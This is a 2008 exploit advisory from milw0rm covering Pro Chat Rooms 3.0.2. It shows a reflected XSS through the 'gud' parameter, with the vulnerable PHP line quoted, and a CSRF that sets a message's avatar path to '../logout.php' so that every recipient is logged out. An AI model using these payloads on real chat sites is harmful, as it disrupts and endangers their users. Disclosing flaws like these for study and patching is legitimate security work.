Pro Chat Rooms 3.0.2 XSS/CSRF Multiple Vulnerabilities

#########################################################################
Pro Chat Rooms Version 3.0.2 (XSS/CSRF) Vulnerabilities
#########################################################################


## AUTHOR : ZynbER
## MAiL   : ZynbER[at]Gmail[dot]com
## HOME   : NoWhere


## Script WebSite : http://www.prochatrooms.com

## Version : Pro Chat Rooms Version 3.0.2


## EXPLOITS :

-==XSS==-

http://www.yoursite.com/[path]/profiles/index.php?gud=XSSED

Vulnerable code in "/profiles/index.php" (the gud parameter is echoed without any escaping):


<b><?php echo C_PRO2;?>: <?php echo $_GET['gud'];?></b>


-==CSRF==-

When a user sends a message in a public room or in a PM to another user, there is a parameter
that sets an avatar (e.g. "image.gif"); this parameter is abused to trigger a CSRF when the recipient gets the message.

The JS sending function; here you can see all the parameters needed to POST a message to a user/room:

//Add a message to the chat server.
function sendChatText() {

    if(!document.getElementById('txt_message').value) {
        alert("You have not entered a message ");
        return;
    }
    if(document.getElementById('whisper').value.toLowerCase() == document.getElementById('thisuser').value.toLowerCase()) {
        alert("You cannot whisper to yourself! ");
        return;
    }
    if (sendReq.readyState == 4 || sendReq.readyState == 0) {
        sendReq.open("POST", 'sendData.php?chat=1&last=' + lastMessage + '&room=' + room, true);
        sendReq.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
        sendReq.onreadystatechange = handleSendChat;
        var param = 'message=' + document.getElementById('txt_message').value;
        param += '&name=' + chat_user;
        param += '&nid=' + chat_userid;
        param += '&chat=1';
        param += '&room=' + room;
        param += '&whisper=' + document.getElementById('whisper').value;
        param += '&fontface=' + document.getElementById('font_face').value;
        param += '&fontcolor=' + document.getElementById('font_color').value;
        param += '&fontheight=' + document.getElementById('font_height').value;
        param += '&fontstyle=' + document.getElementById('font_style').value;
        param += '&avatar=' + document.getElementById('user_avatar').value;
        sendReq.send(param);
        document.getElementById('txt_message').value = '';
    }
}


Exploit Example:

default    ==> http://www.yoursite.com/[path]/Avatars/online.gif


Malicious CSRF parameter:     avatar=../logout.php ==> new avatar path http://www.yoursite.com/[path]/logout.php


In this example the user is logged out when he receives your message; in a public room all users will
be logged out of the room ;)




## Note:

This information is for educational purposes only;
I'm not responsible for any damage caused...



## GREETZ    :   Str0ke - 7issa - Zakhm0ki - samIR - Chicha - Sn@k-baraka

          -=== Marequin, and proud to be ===-

#########################################################################
Pro Chat Rooms Version 3.0.2   (XSS/CSRF) Vulnerabilities
#########################################################################

# milw0rm.com [2008-12-10]